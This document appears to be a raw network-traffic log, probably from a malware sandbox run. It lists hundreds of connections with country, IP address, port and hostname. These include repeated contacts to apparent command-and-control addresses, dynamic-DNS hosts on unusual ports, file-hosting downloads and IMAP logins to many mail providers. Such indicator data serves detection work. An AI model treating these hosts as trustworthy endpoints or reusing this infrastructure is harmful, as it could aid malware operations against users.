US 162.240.81.18:80 www.irmaosconstrusilva.store tcp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 api.twitter.com udp
US 104.244.42.194:443 api.twitter.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 apiv2.jofogas.hu udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.ljwixsb.top udp
US 8.8.8.8:53 jnb-efz.ms-acdc.office.com udp
ZA 52.98.20.178:443 jnb-efz.ms-acdc.office.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
ZA 52.98.20.178:443 jnb-efz.ms-acdc.office.com tcp
ZA 52.98.20.178:443 jnb-efz.ms-acdc.office.com tcp
US 129.153.80.87:8855 tcp
US 194.49.94.152:50500 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
ZA 52.98.20.178:443 jnb-efz.ms-acdc.office.com tcp
US 8.8.8.8:53 112.69.33.194.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 178.20.98.52.in-addr.arpa udp
ZA 52.98.20.178:443 jnb-efz.ms-acdc.office.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 as.wiz.cn udp
US 8.8.8.8:53 apiv2.jofogas.hu udp
CN 120.55.138.92:443 as.wiz.cn tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
US 8.8.8.8:53 api.steampowered.com udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 i.instagram.com udp
NL 157.240.247.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 63.247.240.157.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.3gnz.com udp
US 172.67.181.168:80 www.3gnz.com tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
RU 91.194.2.86:80 www.finebb.net tcp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
US 8.8.8.8:53 168.181.67.172.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 mail.zeelandnet.nl udp
NL 62.45.70.150:143 mail.zeelandnet.nl tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 23.222.49.98:80 api.steampowered.com tcp
US 13.107.42.13:443 onedrive.live.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 mail.be udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 150.70.45.62.in-addr.arpa udp
GB 212.3.242.82:993 mail.be tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 work.a-poster.info udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 37.1.217.172:25000 work.a-poster.info tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
DE 136.243.92.92:80 www.mobdigim.com tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 imap.telenet.be udp
BG 185.141.63.4:1074 tcp
BE 195.130.132.15:993 imap.telenet.be tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.paypal.com udp
US 192.229.221.25:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
US 194.49.94.152:50500 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 imap.ziggo.nl udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
NL 84.116.6.3:993 imap.ziggo.nl tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.194.2.86:80 www.finebb.net tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BE 195.130.132.15:993 imap.telenet.be tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 37.1.217.172:25000 work.a-poster.info tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
HK 34.92.57.107:80 www.yf168vip.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 www.gzshbsh.net udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HK 168.76.252.79:80 www.gzshbsh.net tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.instagram.com udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
NL 157.240.201.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 79.252.76.168.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 13.248.169.48:80 www.spacecargo.net tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 steamcommunity.com udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
GB 212.3.242.82:143 mail.be tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 datastream.myvnc.com udp
RU 91.215.85.63:5225 datastream.myvnc.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.248.169.48:80 www.spacecargo.net tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 129.153.80.87:8855 tcp
US 194.49.94.152:50500 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 i.instagram.com udp
BG 185.141.63.4:1074 tcp
FR 157.240.196.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
NL 157.240.201.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
GB 212.3.242.82:993 mail.be tcp
BG 185.141.63.4:1074 tcp
NL 157.240.201.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 jnb-efz.ms-acdc.office.com udp
BG 185.141.63.4:1074 tcp
ZA 52.98.18.2:443 jnb-efz.ms-acdc.office.com tcp
ZA 52.98.18.2:443 jnb-efz.ms-acdc.office.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
ZA 52.98.18.2:443 jnb-efz.ms-acdc.office.com tcp
US 192.229.221.25:443 www.paypal.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 2.18.98.52.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
ZA 52.98.18.2:443 jnb-efz.ms-acdc.office.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
NL 142.250.102.102:443 s.youtube.com tcp
ZA 52.98.18.2:443 jnb-efz.ms-acdc.office.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.kpnmail.nl udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 102.102.250.142.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
NL 195.121.65.133:993 imap.kpnmail.nl tcp
BG 185.141.63.4:1074 tcp
US 203.161.61.170:80 www.tecverse.xyz tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 172.67.181.168:80 www.3gnz.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 gservicese.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
RU 91.215.85.63:2718 gservicese.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 host-file-host6.com udp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 host-host-file8.com udp
BG 185.141.63.4:1074 tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
US 95.214.26.28:80 host-host-file8.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 13.107.42.13:443 onedrive.live.com tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.253:80 ewixgdb.ua tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
TR 185.83.146.204:80 www.hreeremaeps.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 84.116.6.3:993 imap.ziggo.nl tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 service-domain.xyz udp
US 3.80.150.121:443 service-domain.xyz tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 208.91.197.132:80 www.shopbons-mall.com tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 center.onthewifi.com udp
RU 91.215.85.63:8118 center.onthewifi.com tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 192.229.221.25:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.instagram.com udp
NL 157.240.247.174:443 www.instagram.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 188.114.97.0:80 www.bord90-1us.click tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.whoops.store udp
DE 3.64.163.50:80 www.whoops.store tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 50.163.64.3.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
US 34.120.175.65:80 www.333vvs.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 api.steampowered.com udp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.poczta.onet.pl udp
PL 213.180.147.154:993 imap.poczta.onet.pl tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
US 8.8.8.8:53 154.147.180.213.in-addr.arpa udp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.112:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 apiv2.jofogas.hu udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.amazon.com udp
US 8.8.8.8:53 steamcommunity.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 18.239.70.131:443 www.amazon.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.viddry.online udp
NL 37.97.254.27:80 www.viddry.online tcp
BE 195.13.7.87:993 imap.proximus.be tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 131.70.239.18.in-addr.arpa udp
US 8.8.8.8:53 27.254.97.37.in-addr.arpa udp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 8.8.8.8:53 www.strategicprojectmgmt.com udp
US 8.8.8.8:53 listpoints.online udp
US 8.8.8.8:53 retghrtgwtrgtg.bounceme.net udp
CA 108.181.20.37:443 files.catbox.moe tcp
RU 91.215.85.63:3839 retghrtgwtrgtg.bounceme.net tcp
RU 193.37.71.22:80 193.37.71.22 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
RU 185.172.128.100:80 185.172.128.100 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 i.instagram.com udp
FR 157.240.196.63:443 i.instagram.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 files.catbox.moe udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
PL 213.180.147.154:993 imap.poczta.onet.pl tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 www.tecverse.xyz udp
US 203.161.61.170:80 www.tecverse.xyz tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 s.youtube.com udp
US 151.101.1.21:443 www.paypal.com tcp
BG 185.141.63.4:1074 tcp
NL 142.250.102.138:443 s.youtube.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 13.107.42.13:443 onedrive.live.com tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 188.114.96.9:80 www.cmmug.asia tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 imap.ziggo.nl udp
NL 84.116.6.3:993 imap.ziggo.nl tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
US 8.8.8.8:53 imap.telenet.be udp
BE 195.130.132.14:993 imap.telenet.be tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 14.132.130.195.in-addr.arpa udp
BG 185.141.63.4:1074 tcp
US 129.153.80.87:8855 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
US 194.49.94.152:50500 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 api.vk.com udp
RU 87.240.190.70:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 www.earthdatascape.com udp
CA 108.181.20.37:443 files.catbox.moe tcp
IT 62.149.128.45:80 www.earthdatascape.com tcp
US 8.8.8.8:53 www.yf168vip.com udp
HK 34.92.57.107:80 www.yf168vip.com tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 45.128.149.62.in-addr.arpa udp
US 8.8.8.8:53 70.190.240.87.in-addr.arpa udp
RU 87.240.190.70:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 api.crunchyroll.com udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 pastebin.com udp
RU 87.240.190.70:443 api.vk.com tcp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 202.34.18.104.in-addr.arpa udp
US 104.20.68.143:443 pastebin.com tcp
US 188.114.97.0:443 yip.su tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 8.8.8.8:53 listpoints.click udp
RU 91.215.85.63:7020 listpoints.click tcp
MY 111.90.146.230:80 tcp
US 8.8.8.8:53 sl.himanfast.com udp
US 8.8.8.8:53 gobo25cl.top udp
US 8.8.8.8:53 thecrazymonkey.org udp
US 8.8.8.8:53 redirector.pm udp
US 188.114.97.0:80 sl.himanfast.com tcp
US 172.67.197.19:80 gobo25cl.top tcp
US 8.8.8.8:53 net.geo.opera.com udp
BG 91.92.243.139:80 91.92.243.139 tcp
US 194.49.94.85:443 redirector.pm tcp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 172.67.197.19:443 gobo25cl.top tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
US 13.107.42.13:443 onedrive.live.com tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 free.os.pl udp
RU 87.240.190.70:443 api.vk.com tcp
FR 54.36.104.47:143 free.os.pl tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 47.104.36.54.in-addr.arpa udp
US 8.8.8.8:53 www.mountainhumanresource.com udp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
RU 193.37.71.22:80 193.37.71.22 tcp
NP 202.51.74.192:80 www.mountainhumanresource.com tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
BG 185.141.63.4:1074 tcp
US 104.20.68.143:443 pastebin.com tcp
RU 87.240.190.70:443 api.vk.com tcp
US 8.8.8.8:53 flyawayaero.net udp
BG 185.141.63.4:1074 tcp
US 172.67.197.19:80 gobo25cl.top tcp
US 172.67.197.19:443 gobo25cl.top tcp
US 172.67.216.81:443 flyawayaero.net tcp
US 194.49.94.85:443 redirector.pm tcp
US 8.8.8.8:53 potatogoose.com udp
US 8.8.8.8:53 192.74.51.202.in-addr.arpa udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 104.21.35.235:443 potatogoose.com tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
US 8.8.8.8:53 northmuyaspropertyinvestment.com udp
BG 185.141.63.4:1074 tcp
BG 91.92.243.139:80 91.92.243.139 tcp
TR 78.135.105.12:443 northmuyaspropertyinvestment.com tcp
US 8.8.8.8:53 steamcommunity.com udp
US 188.114.97.0:443 sl.himanfast.com tcp
US 104.18.34.202:443 api.crunchyroll.com tcp
NL 23.222.49.98:443 steamcommunity.com tcp
BG 185.141.63.4:1074 tcp
BG 185.141.63.4:1074 tcp
RU 87.240.190.70:443 api.vk.com tcp
BG 185.141.63.4:1074 tcp
US 8.8.8.8:53 mi.claro.com.pe udp
US 194.49.94.152:50500 tcp
US 8.8.8.8:53 api.steampowered.com udp
US 66.225.237.161:443 mi.claro.com.pe tcp
RU 193.37.71.22:80 193.37.71.22 tcp
BG 185.141.63.4:1074 tcp
CA 108.181.20.37:443 files.catbox.moe tcp
NL 23.222.49.98:80 api.steampowered.com tcp
BG 185.141.63.4:1074 tcp
HU 194.33.69.111:443 apiv2.jofogas.hu tcp
BG 185.141.63.4:1074 tcp
